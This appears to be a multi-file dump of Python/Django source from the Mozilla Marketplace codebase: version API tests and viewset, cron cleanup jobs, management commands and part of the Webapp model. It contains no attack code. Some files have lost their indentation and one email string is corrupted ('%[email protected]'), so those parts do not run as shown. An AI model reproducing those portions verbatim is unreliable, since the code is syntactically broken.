class TestVersionSerializer(TestCase):
    """Tests for VersionSerializer.to_native()."""

    def setUp(self):
        self.app = app_factory()
        self.features = self.app.current_version.features
        self.request = RequestFactory().get('/')
        self.serializer = VersionSerializer(context={'request': self.request})

    def native(self, obj=None, **kwargs):
        # Serialize `obj` (default: the app's current version), applying
        # any model updates given in kwargs first.
        if not obj:
            obj = self.app.current_version
        obj.update(**kwargs)
        return self.serializer.to_native(obj)

    def test_renamed_fields(self):
        """Internal field names are replaced by their public API names."""
        native = self.native()
        removed_keys = self.serializer.Meta.field_rename.keys()
        added_keys = self.serializer.Meta.field_rename.values()
        ok_(all(not k in native for k in removed_keys))
        ok_(all(k in native for k in added_keys))

    def test_addon(self):
        eq_(self.native()['app'], reverse('app-detail',
                                          kwargs={'pk': self.app.pk}))

    def test_is_current_version(self):
        old_version = Version.objects.create(addon=self.app, version='0.1')
        ok_(self.native()['is_current_version'])
        ok_(not self.native(obj=old_version)['is_current_version'])

    def test_features(self, **kwargs):
        # Every enabled has_* flag must surface in the 'features' list.
        if kwargs:
            self.features.update(**kwargs)
        native = self.native()
        for key in dir(self.features):
            if key.startswith('has_') and getattr(self.features, key):
                ok_(key.replace('has_', '') in native['features'])

    def test_features_updated(self):
        self.test_features(has_fm=True)
########NEW FILE########
__FILENAME__ = test_views
import json
from django.core.urlresolvers import reverse
from nose.tools import eq_, ok_
from rest_framework.reverse import reverse as rest_reverse
from test_utils import RequestFactory
import amo
from amo.tests import app_factory
from mkt.api.base import get_url
from mkt.api.tests.test_oauth import RestOAuth
from mkt.site.fixtures import fixture
from versions.models import Version
class TestVersionViewSet(RestOAuth):
    """API tests for the version-detail endpoint (GET / PATCH)."""
    fixtures = fixture('user_2519')

    def setUp(self):
        self.app = app_factory()
        self.app_url = get_url('app', self.app.pk)
        self.version = self.app.current_version
        self.request = RequestFactory()
        super(TestVersionViewSet, self).setUp()

    def test_has_cors(self):
        url = rest_reverse('version-detail', kwargs={'pk': self.version.pk})
        self.assertCORS(self.client.get(url), 'get', 'put', 'patch')

    def test_get(self, version=None, **kwargs):
        # Also reused by test_get_updated_data with an explicit version.
        if not version:
            version = self.version
        url = rest_reverse('version-detail', kwargs={'pk': version.pk})
        res = self.client.get(url, kwargs)
        data = res.data
        features = data['features']

        eq_(res.status_code, 200)

        # Test values on Version object.
        eq_(data['version'], version.version)
        eq_(data['developer_name'], version.developer_name)
        eq_(data['is_current_version'],
            version == self.app.current_version)
        eq_(data['app'], reverse('app-detail',
                                 kwargs={'pk': self.app.pk}))

        for key in features:
            ok_(getattr(version.features, 'has_' + key))

    def test_get_non_public(self):
        """Non-public apps are hidden from regular and anonymous users."""
        self.app.update(status=amo.STATUS_PENDING)
        url = rest_reverse('version-detail', kwargs={'pk': self.version.pk})
        res = self.client.get(url)
        eq_(res.status_code, 403)
        res = self.anon.get(url)
        eq_(res.status_code, 403)

    def test_get_reviewer_non_public(self):
        self.app.update(status=amo.STATUS_PENDING)
        self.grant_permission(self.profile, 'Apps:Review')
        url = rest_reverse('version-detail', kwargs={'pk': self.version.pk})
        res = self.client.get(url)
        eq_(res.status_code, 200)

    def test_get_owner_non_public(self):
        self.app.update(status=amo.STATUS_PENDING)
        self.app.addonuser_set.create(user=self.user)
        url = rest_reverse('version-detail', kwargs={'pk': self.version.pk})
        res = self.client.get(url)
        eq_(res.status_code, 200)

    def test_get_updated_data(self):
        version = Version.objects.create(addon=self.app, version='1.2')
        version.features.update(has_mp3=True, has_fm=True)
        self.app.update(_latest_version=version, _current_version=version)

        self.test_get()  # Test old version
        self.test_get(version=version)  # Test new version

    def patch(self, features=None):
        # Helper: issue a (PUT-spelled) partial update and return the
        # payload we sent plus the response.
        data = {
            'features': features or ['fm', 'mp3'],
            'developer_name': "Cee's Vans"
        }
        url = rest_reverse('version-detail', kwargs={'pk': self.version.pk})
        # Uses PUT because Django's test client didn't support PATCH until
        # bug #17797 was resolved.
        res = self.client.put(url, data=json.dumps(data),
                              content_type='application/json')
        return data, res

    def test_patch(self):
        self.app.addonuser_set.create(user=self.user)
        data, res = self.patch()
        eq_(res.status_code, 200)
        self.assertSetEqual(self.version.features.to_keys(),
                            ['has_' + f for f in data['features']])

    def test_patch_bad_features(self):
        """Unknown feature names yield a 400."""
        self.app.addonuser_set.create(user=self.user)
        data, res = self.patch(features=['bad'])
        eq_(res.status_code, 400)

    def test_patch_no_permission(self):
        data, res = self.patch()
        eq_(res.status_code, 403)

    def test_patch_reviewer_permission(self):
        self.grant_permission(self.profile, 'Apps:Review')
        data, res = self.patch()
        eq_(res.status_code, 200)

    def test_get_deleted_app(self):
        url = rest_reverse('version-detail', kwargs={'pk': self.version.pk})
        self.app.delete()
        res = self.client.get(url)
        eq_(res.status_code, 404)

    def test_get_non_app(self):
        """Versions of non-webapp addons are excluded from the queryset."""
        self.app.update(type=amo.ADDON_PERSONA)
        url = rest_reverse('version-detail', kwargs={'pk': self.version.pk})
        res = self.client.get(url)
        eq_(res.status_code, 404)

    def test_delete(self):
        """DELETE is not an allowed method on this endpoint."""
        url = rest_reverse('version-detail', kwargs={'pk': self.version.pk})
        res = self.client.delete(url)
        eq_(res.status_code, 405)
########NEW FILE########
__FILENAME__ = urls
from rest_framework import routers
from .views import VersionViewSet
# Register the viewset with DRF's default router, which generates the
# 'version-list'/'version-detail' URL names used elsewhere.
router = routers.DefaultRouter()
router.register(r'versions', VersionViewSet)

urlpatterns = router.urls
########NEW FILE########
__FILENAME__ = views
from rest_framework import mixins, viewsets
from rest_framework.exceptions import ParseError
import amo
from mkt.api.authorization import (AllowReadOnlyIfPublic, AllowRelatedAppOwner,
AnyOf, GroupPermission)
from mkt.api.base import CORSMixin
from mkt.constants import APP_FEATURES
from mkt.versions.serializers import VersionSerializer
from versions.models import Version
class VersionViewSet(CORSMixin, mixins.RetrieveModelMixin,
                     mixins.UpdateModelMixin, viewsets.GenericViewSet):
    """Retrieve a webapp version and update its feature profile."""
    queryset = Version.objects.filter(
        addon__type=amo.ADDON_WEBAPP).exclude(addon__status=amo.STATUS_DELETED)
    serializer_class = VersionSerializer
    authorization_classes = []
    permission_classes = [AnyOf(AllowRelatedAppOwner,
                                GroupPermission('Apps', 'Review'),
                                AllowReadOnlyIfPublic)]
    cors_allowed_methods = ['get', 'patch', 'put']

    def update(self, request, *args, **kwargs):
        """
        Allow a version's features to be updated.

        Raises ParseError (400) for unknown feature names. Any feature
        not listed in the request is reset to False.
        """
        obj = self.get_object()

        # Update features if they are provided.
        if 'features' in request.DATA:
            features = request.DATA['features']

            # Raise an exception if any invalid features are passed.
            # (Truthiness check on the list replaces the redundant any().)
            invalid = [f for f in features if f.upper() not in APP_FEATURES]
            if invalid:
                raise ParseError('Invalid feature(s): %s' % ', '.join(invalid))

            # Update the value of each feature (note: a feature not present
            # in the request data is assumed to be False).
            data = {}
            for key in APP_FEATURES:
                data['has_' + key.lower()] = key.lower() in features
            obj.features.update(**data)

            del request.DATA['features']

        return super(VersionViewSet, self).update(request, *args, **kwargs)
########NEW FILE########
__FILENAME__ = cron
import os
import shutil
import stat
import time
from datetime import datetime, timedelta
from django.conf import settings
import commonware.log
import cronjobs
from celery import chord
import amo
from amo.utils import chunked
from devhub.models import ActivityLog
from mkt.api.models import Nonce
from .models import Installed, Webapp
from .tasks import (dump_user_installs, update_downloads, update_trending,
zip_users)
log = commonware.log.getLogger('z.cron')
@cronjobs.register
def clean_old_signed(seconds=60 * 60):
    """Clean out apps signed for reviewers."""
    log.info('Removing old apps signed for reviewers')
    root = settings.SIGNED_APPS_REVIEWER_PATH
    for name in os.listdir(root):
        full = os.path.join(root, name)
        # Age is measured from the last access time of the entry.
        age = time.time() - os.stat(full)[stat.ST_ATIME]
        if age <= seconds:
            continue
        log.debug('Removing signed app: %s, %dsecs old.' % (full, age))
        shutil.rmtree(full)
@cronjobs.register
def update_app_trending():
    """
    Update trending for all apps.

    Spread these tasks out successively by 15 seconds so they don't hit
    Monolith all at once.
    """
    seconds_between = 15
    all_ids = list(Webapp.objects.filter(status=amo.STATUS_PUBLIC)
                                 .values_list('id', flat=True))
    for index, ids in enumerate(chunked(all_ids, 50)):
        update_trending.delay(ids, countdown=index * seconds_between)
@cronjobs.register
def dump_user_installs_cron():
    """
    Sets up tasks to do user install dumps.

    Fans out one dump_user_installs subtask per 100 users and zips the
    results once all subtasks finish (celery chord).
    """
    chunk_size = 100
    # Get valid users to dump.
    user_ids = set(Installed.objects.filter(addon__type=amo.ADDON_WEBAPP)
                   .values_list('user', flat=True))

    # Remove old dump data before running.
    user_dir = os.path.join(settings.DUMPED_USERS_PATH, 'users')
    if os.path.exists(user_dir):
        shutil.rmtree(user_dir)

    grouping = []
    for chunk in chunked(user_ids, chunk_size):
        grouping.append(dump_user_installs.subtask(args=[chunk]))

    # The zip step must not receive the chunk results, hence immutable.
    post = zip_users.subtask(immutable=True)
    ts = chord(grouping, post)
    ts.apply_async()
@cronjobs.register
def update_app_downloads():
    """
    Update download/install stats for all apps.

    Spread these tasks out successively by `seconds_between` seconds so
    they don't hit Monolith all at once.
    """
    seconds_between = 2
    all_ids = list(Webapp.objects.filter(status=amo.STATUS_PUBLIC)
                                 .values_list('id', flat=True))
    for index, ids in enumerate(chunked(all_ids, 50)):
        update_downloads.delay(ids, countdown=index * seconds_between)
@cronjobs.register
def mkt_gc(**kw):
    """Site-wide garbage collections.

    Prunes old activity logs, expired OAuth nonces, and stale app/user
    dump tarballs from disk.
    """
    days_ago = lambda days: datetime.today() - timedelta(days=days)

    log.debug('Collecting data to delete')
    logs = (ActivityLog.objects.filter(created__lt=days_ago(90))
            .exclude(action__in=amo.LOG_KEEP).values_list('id', flat=True))

    for chunk in chunked(logs, 100):
        chunk.sort()
        log.debug('Deleting log entries: %s' % str(chunk))
        amo.tasks.delete_logs.delay(chunk)

    # Clear oauth nonce rows. These expire after 10 minutes but we're just
    # clearing those that are more than 1 day old.
    Nonce.objects.filter(created__lt=days_ago(1)).delete()

    # Delete the dump apps over 30 days.
    for app in os.listdir(settings.DUMPED_APPS_PATH):
        app = os.path.join(settings.DUMPED_APPS_PATH, app)
        if (os.stat(app).st_mtime < time.time() -
            settings.DUMPED_APPS_DAYS_DELETE):
            log.debug('Deleting old tarball: {0}'.format(app))
            os.remove(app)

    # Delete the dumped user installs over 30 days.
    tarball_path = os.path.join(settings.DUMPED_USERS_PATH, 'tarballs')
    for filename in os.listdir(tarball_path):
        filepath = os.path.join(tarball_path, filename)
        if (os.stat(filepath).st_mtime < time.time() -
            settings.DUMPED_USERS_DAYS_DELETE):
            log.debug('Deleting old tarball: {0}'.format(filepath))
            os.remove(filepath)
########NEW FILE########
__FILENAME__ = decorators
import functools
from django import http
from django.shortcuts import get_object_or_404
from mkt.webapps.models import Webapp
import commonware.log
log = commonware.log.getLogger('mkt.purchase')
def app_view(f, qs=Webapp.objects.all):
    """Decorator: resolve an app identifier to a Webapp and pass it to `f`.

    `qs` must be a *callable* returning a queryset (evaluated per request);
    see app_view_factory below for why.
    """
    @functools.wraps(f)
    def wrapper(request, addon_id=None, app_slug=None, *args,
                **kw):
        """Provides an addon given either an addon_id or app_slug."""
        assert addon_id or app_slug, 'Must provide addon_id or app_slug'
        get = lambda **kw: get_object_or_404(qs(), **kw)
        if addon_id and addon_id.isdigit():
            # Numeric identifier: look up by id, then 301 to the canonical
            # slug URL so each app has a single address.
            addon = get(id=addon_id)
            # Don't get in an infinite loop if addon.slug.isdigit().
            if addon.slug != addon_id:
                url = request.path.replace(addon_id, addon.slug)
                if request.GET:
                    url += '?' + request.GET.urlencode()
                return http.HttpResponsePermanentRedirect(url)
        elif addon_id:
            addon = get(slug=addon_id)
        elif app_slug:
            addon = get(app_slug=app_slug)
        return f(request, addon, *args, **kw)
    return wrapper
def app_view_factory(qs):
    """Build an app_view decorator bound to the queryset callable `qs`.

    Don't evaluate qs or the locale will get stuck on whatever the server
    starts with. The webapp_view() decorator will call qs with no arguments
    before doing anything, so lambdas are ok.
    GOOD: Webapp.objects.valid
    GOOD: lambda: Webapp.objects.valid().filter(type=1)
    BAD: Webapp.objects.valid()
    """
    def decorator(f):
        return app_view(f, qs=qs)
    return decorator
########NEW FILE########
__FILENAME__ = export_data
from django.core.management.base import BaseCommand
from mkt.webapps.tasks import export_data
class Command(BaseCommand):
    """Management command: kick off the third-party data export task."""
    help = 'Export our data as a tgz for third-parties'
    def handle(self, *args, **kwargs):
        # Execute as a celery task so we get the right permissions.
        export_data.delay()
########NEW FILE########
__FILENAME__ = generate_receipts
from optparse import make_option
from django.core.management.base import BaseCommand, CommandError
import json
import os
import tempfile
import time
import amo
from addons.models import Addon
from users.models import UserProfile
from mkt.webapps.models import Installed
class Command(BaseCommand):
"""
Used to generate a whole pile of receipts that can be used for
load testing. The receipts need to be generated because they use
the receipt key for the particular server.
This will create users, addons and installed records, so that the
verify script can be load tested properly.
These records are placed into a JSON file. Run the delete command
to clean these out afterwards.
"""
option_list = BaseCommand.option_list + (
make_option('--action', action='store', type='string',
dest='action', help='Action: create, delete.'),
make_option('--dir', action='store', type='string',
dest='dir', help='Directory to read or write data.'),
make_option('--number', action='store', type='int', default='10',
dest='number', help='Number of receipts, default: %default')
)
def filename(self, rest):
return os.path.join(self.dest, rest)
def handle(self, *args, **options):
self.dest = options.get('dir')
action = options.get('action')
if action not in ['create', 'delete']:
raise CommandError('Action: create or delete')
if not self.dest:
self.dest = tempfile.mkdtemp()
print '--dir not specified, using: %s' % self.dest
if not os.path.exists(self.dest):
print 'Creating output directory, %s' % self.dest
os.makedirs(self.dest)
self.number = options.get('number')
return getattr(self, action)()
def create(self):
"""
Creates users, webapps and installed records. Outputs the receipts
and created records into the supplied directory.
"""
created = {'users': [], 'webapps': [], 'installed': []}
number = self.number
stamp = str(time.time())
for x in xrange(number):
name = 'generate-receipt-%s-%s' % (stamp, x)
user = UserProfile.objects.create(email='%[email protected]' % name,
username=name)
created['users'].append(user.pk)
for x in xrange(number):
name = 'generate-receipt-%s-%s' % (stamp, x)
addon = Addon.objects.create(name=name,
type=amo.ADDON_WEBAPP,
manifest_url='http://a.com/m.webapp')
created['webapps'].append(addon.pk)
for x in xrange(number):
installed = Installed.objects.create(
addon_id=created['webapps'][x],
user_id=created['users'][x])
created['installed'].append(installed.pk)
filename = self.filename('%s.%s.receipt' %
(created['webapps'][x], x))
open(filename, 'w').write(installed.receipt)
open(self.filename('created.json'), 'w').write(json.dumps(created))
def delete(self):
"""Cleans up once the load testing is run and deletes the records."""
data = json.loads(open(self.filename('created.json'), 'r').read())
for obj, model in (['installed', Installed],
['webapps', Addon],
['users', UserProfile]):
model.objects.filter(pk__in=data[obj]).delete()
########NEW FILE########
__FILENAME__ = list_packaged_apps
from optparse import make_option
from django.core.exceptions import ObjectDoesNotExist
from django.core.management.base import BaseCommand
import amo
from files.models import File
HELP = 'List all Marketplace packaged apps'
statuses = {'pending': amo.STATUS_PENDING,
'public': amo.STATUS_PUBLIC,
'approved': amo.STATUS_PUBLIC_WAITING,
'rejected': amo.STATUS_DISABLED}
class Command(BaseCommand):
    """
    List the file paths of all Marketplace packaged apps, optionally
    restricted to one status.
    Usage:
        python manage.py list_packaged_apps --status=<status>
    """
    option_list = BaseCommand.option_list + (
        make_option('--status',
                    choices=statuses.keys(),
                    help='Status of packaged-app files'),
    )
    help = HELP
    def handle(self, *args, **kwargs):
        files = File.objects.filter(version__addon__type=amo.ADDON_WEBAPP,
                                    version__addon__is_packaged=True)
        if kwargs.get('status'):
            files = files.filter(status=statuses[kwargs['status']])
        filenames = []
        for f in files:
            try:
                filenames.append(f.file_path)
            except ObjectDoesNotExist:
                # Skip files whose related rows are missing.
                pass
        print '\n'.join(filenames)
########NEW FILE########
__FILENAME__ = sign_apps
import logging
from optparse import make_option
from django.core.management.base import BaseCommand
from celery.task.sets import TaskSet
import amo
from addons.models import Webapp
from lib.crypto.packaged import sign
HELP = """\
Start tasks to re-sign web apps.
To specify which webapps to sign:
`--webapps=1234,5678,...9012`
If omitted, all signed apps will be re-signed.
"""
log = logging.getLogger('z.addons')
class Command(BaseCommand):
    """Queue re-signing tasks for public packaged apps (see HELP)."""
    option_list = BaseCommand.option_list + (
        make_option('--webapps',
                    help='Webapp ids to process. Use commas to separate '
                         'multiple ids.'),
    )
    help = HELP
    def handle(self, *args, **kw):
        qs = Webapp.objects.filter(is_packaged=True, status=amo.STATUS_PUBLIC)
        if kw['webapps']:
            pks = [int(a.strip()) for a in kw['webapps'].split(',')]
            qs = qs.filter(pk__in=pks)
        # NOTE(review): assumes every selected app has a current_version;
        # a public packaged app without one would raise here — confirm.
        ts = [sign.subtask(args=[webapp.current_version.pk],
                           kwargs={'resign': True}) for webapp in qs]
        TaskSet(ts).apply_async()
########NEW FILE########
__FILENAME__ = models
# -*- coding: utf-8 -*-
import datetime
import hashlib
import json
import math
import os
import urlparse
import uuid
from collections import defaultdict
from operator import attrgetter
from django.conf import settings
from django.core.cache import cache
from django.core.exceptions import ObjectDoesNotExist
from django.core.files.storage import default_storage as storage
from django.core.urlresolvers import NoReverseMatch
from django.core.urlresolvers import reverse
from django.db import models
from django.db.models import Max, Min, Q, signals as dbsignals
from django.dispatch import receiver
import commonware.log
import json_field
import waffle
from cache_nuggets.lib import memoize, memoize_key
from elasticutils.contrib.django import F, Indexable, MappingType
from tower import ugettext as _
import amo
import amo.models
import mkt
from access.acl import action_allowed, check_reviewer
from addons import query
from addons.models import (Addon, AddonDeviceType, AddonUpsell,
attach_categories, attach_devices, attach_prices,
attach_tags, attach_translations, Category)
from addons.signals import version_changed
from amo.decorators import skip_cache, write
from amo.helpers import absolutify
from amo.storage_utils import copy_stored_file
from amo.utils import JSONEncoder, smart_path, to_language, urlparams
from constants.applications import DEVICE_GAIA, DEVICE_TYPES
from constants.payments import PROVIDER_CHOICES
from files.models import File, nfd_str, Platform
from files.utils import parse_addon, WebAppParser
from lib.crypto import packaged
from lib.iarc.client import get_iarc_client
from lib.iarc.utils import (get_iarc_app_title, render_xml,
REVERSE_DESC_MAPPING, REVERSE_INTERACTIVES_MAPPING)
from mkt.constants import APP_FEATURES, apps
from mkt.developers.models import AddonPaymentAccount
from mkt.regions.utils import parse_region
from mkt.search.utils import S
from mkt.site.models import DynamicBoolFieldsMixin
from mkt.webapps.utils import (dehydrate_content_rating, dehydrate_descriptors,
dehydrate_interactives, get_locale_properties,
get_supported_locales)
from mkt.prices.models import AddonPremium
from translations.fields import PurifiedField, save_signal
from versions.models import Version
log = commonware.log.getLogger('z.addons')
def reverse_version(version):
    """Return the API detail URL for `version`.

    The input is ambiguous by design: it may be a Version object (which has
    a `.pk`) or an already-reversed URL string (which does not). A string is
    handed back unchanged; falsy input yields None.
    """
    if not version:
        return None
    try:
        pk = version.pk
    except AttributeError:
        # Already a reversed URL string.
        return version
    return reverse('version-detail', kwargs={'pk': pk})
class WebappManager(amo.models.ManagerBase):
    """Manager restricting the shared addons table to webapp rows.

    Deleted apps are excluded unless include_deleted=True; every queryset
    gets Webapp.transformer applied.
    """
    def __init__(self, include_deleted=False):
        amo.models.ManagerBase.__init__(self)
        self.include_deleted = include_deleted
    def get_query_set(self):
        qs = super(WebappManager, self).get_query_set()
        # Clone into IndexQuerySet so callers can use .with_index() hints.
        qs = qs._clone(klass=query.IndexQuerySet).filter(
            type=amo.ADDON_WEBAPP)
        if not self.include_deleted:
            qs = qs.exclude(status=amo.STATUS_DELETED)
        return qs.transform(Webapp.transformer)
    def valid(self):
        # Listed statuses and not hidden by the developer.
        return self.filter(status__in=amo.LISTED_STATUSES,
                           disabled_by_user=False)
    def reviewed(self):
        return self.filter(status__in=amo.REVIEWED_STATUSES)
    def visible(self):
        return self.filter(status=amo.STATUS_PUBLIC, disabled_by_user=False)
    def top_free(self, listed=True):
        qs = self.visible() if listed else self
        return (qs.filter(premium_type__in=amo.ADDON_FREES)
                .order_by('-weekly_downloads')
                .with_index(addons='downloads_type_idx'))
    def top_paid(self, listed=True):
        qs = self.visible() if listed else self
        return (qs.filter(premium_type__in=amo.ADDON_PREMIUMS)
                .order_by('-weekly_downloads')
                .with_index(addons='downloads_type_idx'))
    @skip_cache
    def pending(self):
        # - Holding
        # ** Approved -- PUBLIC
        # ** Unapproved -- PENDING
        # - Open
        # ** Reviewed -- PUBLIC
        # ** Unreviewed -- LITE
        # ** Rejected -- REJECTED
        return self.filter(status=amo.WEBAPPS_UNREVIEWED_STATUS)
    @skip_cache
    def pending_in_region(self, region):
        """
        Apps that have been approved by reviewers but unapproved by
        reviewers in special regions (e.g., China).
        """
        region = parse_region(region)
        # Per-region status/nomination live as columns on Geodata.
        column_prefix = '_geodata__region_%s' % region.slug
        return self.filter(**{
            'status__in': amo.WEBAPPS_APPROVED_STATUSES,
            'disabled_by_user': False,
            'escalationqueue__isnull': True,
            '%s_status' % column_prefix: amo.STATUS_PENDING,
        }).order_by('-%s_nominated' % column_prefix)
    def rated(self):
        """IARC."""
        # Only filters when the 'iarc' waffle switch is on.
        if waffle.switch_is_active('iarc'):
            return self.exclude(content_ratings__isnull=True)
        return self
    def by_identifier(self, identifier):
        """
        Look up a single app by its `id` or `app_slug`.
        If the identifier is coercable into an integer, we first check for an
        ID match, falling back to a slug check (probably not necessary, as
        there is validation preventing numeric slugs). Otherwise, we only look
        for a slug match.
        """
        try:
            return self.get(id=identifier)
        except (ObjectDoesNotExist, ValueError):
            return self.get(app_slug=identifier)
# We use super(Addon, self) on purpose to override expectations in Addon that
# are not true for Webapp. Webapp is just inheriting so it can share the db
# table.
class Webapp(Addon):
objects = WebappManager()
with_deleted = WebappManager(include_deleted=True)
class PayAccountDoesNotExist(Exception):
"""The app has no payment account for the query."""
class Meta:
proxy = True
    def save(self, **kw):
        """Save the webapp, forcing the webapp type and slug conventions.

        Deliberately calls super(Addon, ...) — skipping Addon.save — per the
        comment above this class.
        """
        # Make sure we have the right type.
        self.type = amo.ADDON_WEBAPP
        self.clean_slug(slug_field='app_slug')
        self.assign_uuid()
        creating = not self.id
        super(Addon, self).save(**kw)
        if creating:
            # Set the slug once we have an id to keep things in order.
            self.update(slug='app-%s' % self.id)
            # Create Geodata object (a 1-to-1 relationship).
            if not hasattr(self, '_geodata'):
                Geodata.objects.create(addon=self)
    @staticmethod
    def transformer(apps):
        """Queryset transform: bulk-attach versions, previews, prices and
        device types to a batch of Webapp instances."""
        if not apps:
            return
        apps_dict = dict((a.id, a) for a in apps)
        # Only the parts relevant for Webapps are copied over from Addon. In
        # particular this avoids fetching categories and listed_authors, which
        # isn't useful in most parts of the Marketplace.
        # Set _latest_version, _current_version
        Addon.attach_related_versions(apps, apps_dict)
        # Attach previews. Don't use transforms, the only one present is for
        # translations and Previews don't have captions in the Marketplace, and
        # therefore don't have translations.
        Addon.attach_previews(apps, apps_dict, no_transforms=True)
        # Attach prices.
        Addon.attach_prices(apps, apps_dict)
        # FIXME: re-use attach_devices instead ?
        for adt in AddonDeviceType.objects.filter(addon__in=apps_dict):
            if not getattr(apps_dict[adt.addon_id], '_device_types', None):
                apps_dict[adt.addon_id]._device_types = []
            apps_dict[adt.addon_id]._device_types.append(
                DEVICE_TYPES[adt.device_type])
        # FIXME: attach geodata and content ratings. Maybe in a different
        # transformer that would then be called automatically for the API ?
    @staticmethod
    def version_and_file_transformer(apps):
        """Attach all the versions and files to the apps.

        Sets `app.all_versions` on each app and `version.all_files` on each
        of those versions, using two bulk queries instead of N+1.
        """
        # Don't just return an empty list, it will break code that expects
        # a query object
        if not len(apps):
            return apps
        ids = set(app.id for app in apps)
        versions = (Version.objects.no_cache().filter(addon__in=ids)
                    .select_related('addon'))
        vids = [v.id for v in versions]
        files = (File.objects.no_cache().filter(version__in=vids)
                 .select_related('version'))
        # Attach the files to the versions.
        f_dict = dict((k, list(vs)) for k, vs in
                      amo.utils.sorted_groupby(files, 'version_id'))
        for version in versions:
            version.all_files = f_dict.get(version.id, [])
        # Attach the versions to the apps.
        v_dict = dict((k, list(vs)) for k, vs in
                      amo.utils.sorted_groupby(versions, 'addon_id'))
        for app in apps:
            app.all_versions = v_dict.get(app.id, [])
        return apps
@staticmethod
def indexing_transformer(apps):
"""Attach everything we need to index apps."""
transforms = (attach_categories, attach_devices, attach_prices,
attach_tags, attach_translations)
for t in transforms:
qs = apps.transform(t)
return qs
@property
def geodata(self):
if hasattr(self, '_geodata'):
return self._geodata
return Geodata.objects.get_or_create(addon=self)[0]
def get_api_url(self, action=None, api=None, resource=None, pk=False):
"""Reverse a URL for the API."""
if pk:
key = self.pk
else:
key = self.app_slug
return reverse('app-detail', kwargs={'pk': key})
def get_url_path(self, more=False, add_prefix=True, src=None):
# We won't have to do this when Marketplace absorbs all apps views,
# but for now pretend you didn't see this.
try:
url_ = reverse('detail', args=[self.app_slug],
add_prefix=add_prefix)
except NoReverseMatch:
# Fall back to old details page until the views get ported.
return super(Webapp, self).get_url_path(more=more,
add_prefix=add_prefix)
else:
if src is not None:
return urlparams(url_, src=src)
return url_
def get_detail_url(self, action=None):
"""Reverse URLs for 'detail', 'details.record', etc."""
return reverse(('detail.%s' % action) if action else 'detail',
args=[self.app_slug])
def get_purchase_url(self, action=None, args=None):
"""Reverse URLs for 'purchase', 'purchase.done', etc."""
return reverse(('purchase.%s' % action) if action else 'purchase',
args=[self.app_slug] + (args or []))
def get_dev_url(self, action='edit', args=None, prefix_only=False):
# Either link to the "new" Marketplace Developer Hub or the old one.
args = args or []
prefix = 'mkt.developers'
view_name = ('%s.%s' if prefix_only else '%s.apps.%s')
return reverse(view_name % (prefix, action),
args=[self.app_slug] + args)
def get_ratings_url(self, action='list', args=None, add_prefix=True):
"""Reverse URLs for 'ratings.list', 'ratings.add', etc."""
return reverse(('ratings.%s' % action),
args=[self.app_slug] + (args or []),
add_prefix=add_prefix)
def get_stats_url(self):
return reverse('commonplace.stats.app_dashboard', args=[self.app_slug])
def get_comm_thread_url(self):
return reverse('commonplace.commbadge.app_dashboard',
args=[self.app_slug])
@staticmethod
def domain_from_url(url, allow_none=False):
if not url:
if allow_none:
return
raise ValueError('URL was empty')
pieces = urlparse.urlparse(url)
return '%s://%s' % (pieces.scheme, pieces.netloc.lower())
@property
def punycode_app_domain(self):
return self.app_domain.encode('idna')
@property
def parsed_app_domain(self):
if self.is_packaged:
raise ValueError('Packaged apps do not have a domain')
return urlparse.urlparse(self.app_domain)
@property
def device_types(self):
# If the transformer attached something, use it.
if hasattr(self, '_device_types'):
return self._device_types
return [DEVICE_TYPES[d.device_type] for d in
self.addondevicetype_set.order_by('device_type')]
@property
def origin(self):
if self.is_packaged:
return self.app_domain
parsed = urlparse.urlparse(self.get_manifest_url())
return '%s://%s' % (parsed.scheme, parsed.netloc)
    def get_manifest_url(self, reviewer=False):
        """
        Hosted apps: a URI to an external manifest.
        Packaged apps: a URI to a mini manifest on m.m.o. If reviewer, the
        mini-manifest behind reviewer auth pointing to the reviewer-signed
        package.
        """
        if self.is_packaged:
            if reviewer and self.latest_version:
                # Get latest version and return reviewer manifest URL.
                version = self.latest_version
                return absolutify(reverse('reviewers.mini_manifest',
                                          args=[self.app_slug, version.id]))
            elif self.current_version:
                # Public mini-manifest is keyed by the app's guid.
                return absolutify(reverse('detail.manifest', args=[self.guid]))
            else:
                return ''  # No valid version.
        else:
            # Hosted app: the developer-supplied manifest URL.
            return self.manifest_url
def has_icon_in_manifest(self):
data = self.get_manifest_json()
return 'icons' in data
    def get_manifest_json(self, file_obj=None):
        """Return the parsed manifest dict for `file_obj` (or the latest
        file), or None when the app has no file.

        Prefers the manifest stored on the version (AppManifest row) and
        falls back to parsing it off disk.
        """
        file_ = file_obj or self.get_latest_file()
        if not file_:
            return
        try:
            return file_.version.manifest
        except AppManifest.DoesNotExist:
            # TODO: Remove this when we're satisified the above is working.
            log.info('Falling back to loading manifest from file system. '
                     'Webapp:%s File:%s' % (self.id, file_.id))
            # Disabled files live in the guarded path.
            if file_.status == amo.STATUS_DISABLED:
                file_path = file_.guarded_file_path
            else:
                file_path = file_.file_path
            return WebAppParser().get_json_data(file_path)
    def manifest_updated(self, manifest, upload):
        """The manifest has updated, update the version and file.
        This is intended to be used for hosted apps only, which have only a
        single version and a single file.
        """
        # Validate and re-parse; the `manifest` argument is replaced by the
        # freshly parsed JSON from the upload.
        data = parse_addon(upload, self)
        manifest = WebAppParser().get_json_data(upload)
        version = self.versions.latest()
        # Truncate developer_name to the DB column length.
        max_ = Version._meta.get_field_by_name('_developer_name')[0].max_length
        version.update(version=data['version'],
                       _developer_name=data['developer_name'][:max_])
        try:
            version.manifest_json.update(manifest=json.dumps(manifest))
        except AppManifest.DoesNotExist:
            AppManifest.objects.create(version=version,
                                       manifest=json.dumps(manifest))
        path = smart_path(nfd_str(upload.path))
        file = version.files.latest()
        file.filename = file.generate_filename(extension='.webapp')
        file.size = storage.size(path)
        file.hash = file.generate_hash(path)
        log.info('Updated file hash to %s' % file.hash)
        file.save()
        # Move the uploaded file from the temp location.
        copy_stored_file(path, os.path.join(version.path_prefix,
                                            nfd_str(file.filename)))
        log.info('[Webapp:%s] Copied updated manifest to %s' % (
            self, version.path_prefix))
        amo.log(amo.LOG.MANIFEST_UPDATED, self)
def has_incomplete_status(self):
return self.is_incomplete()
    def details_errors(self):
        """
        See if initial app submission is complete (details).
        Returns list of reasons app may not be complete.
        """
        reasons = []
        if not self.support_email:
            reasons.append(_('You must provide a support email.'))
        if not self.name:
            reasons.append(_('You must provide an app name.'))
        if not self.device_types:
            reasons.append(_('You must provide at least one device type.'))
        if not self.categories.count():
            reasons.append(_('You must provide at least one category.'))
        if not self.previews.count():
            reasons.append(_('You must upload at least one screenshot or '
                             'video.'))
        # Empty list means the details step is complete.
        return reasons
def details_complete(self):
"""
Checks if app detail submission is complete (first step of submit).
"""
